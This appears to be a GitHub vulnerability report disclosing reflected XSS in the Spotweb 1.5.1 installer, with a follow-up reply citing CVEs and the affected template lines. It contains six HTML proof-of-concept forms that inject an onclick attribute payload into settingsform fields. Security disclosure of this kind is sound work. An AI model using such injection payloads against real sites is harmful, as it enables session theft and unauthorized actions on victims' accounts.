Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim's browser.
Note that multiple such XSS vulnerabilities exist in Spotweb.
Have you searched the internet or Github for an answer?
Not related
To Reproduce
Steps to reproduce the behavior:
Go to the installation page.
Complete the configuration, including the DB connection, until you reach step 4 of the installer (install.php?page=4).
Open each of the following HTML files in the browser.
Exploit 1 - exploit username parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[username]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 2 - exploit newpassword1 parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[newpassword1]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 3 - exploit newpassword2 parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[newpassword2]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 4 - exploit firstname parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[firstname]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 5 - exploit lastname parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[lastname]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Exploit 6 - exploit mail parameter
<html><form method="POST" action="http://[localhost]/spotweb/install.php?page=4"><input name='settingsform[mail]' value="1' onclick='alert(1)"><button>Send my greetings</button></form></html>
Click each text field.
Boom!
Expected behavior
This may lead to unauthorized actions being performed, unauthorized access to data, theft of session information, denial of service, etc. To exploit it against a victim, an attacker needs to coerce the user into visiting a link carrying the XSS payload.
Screenshots
Desktop (please complete the following information):
(server) OS: Ubuntu
(client) OS: Windows
Browser: Chrome
Spotweb version: 1.5.1 and below
Branch: Develop and Master
PHP version: 7.1
Additional context
The code at the locations listed below (in spotweb/templates/installer/step-004.inc.php) displays the user-controlled parameters username, newpassword1, newpassword2, firstname, lastname and mail with incorrect sanitization:
Yes, you are right. However, remember that XSS vulnerabilities that occur during the installation process are also vulnerabilities.
For example, in CVE-2021-37389, CVE-2014-9571, CVE-2020-26043, CVE-2020-18670, etc., you can see the vendors acknowledging that there are vulnerabilities.
The code below displays the user-controlled parameters username, newpassword1, newpassword2, firstname, lastname and mail with incorrect sanitization (permalinks at commit be2ab76):
spotweb/templates/installer/step-004.inc.php, line 41 in be2ab76
spotweb/templates/installer/step-004.inc.php, line 46 in be2ab76
spotweb/templates/installer/step-004.inc.php, line 51 in be2ab76
spotweb/templates/installer/step-004.inc.php, line 56 in be2ab76
spotweb/templates/installer/step-004.inc.php, line 61 in be2ab76
spotweb/templates/installer/step-004.inc.php, line 66 in be2ab76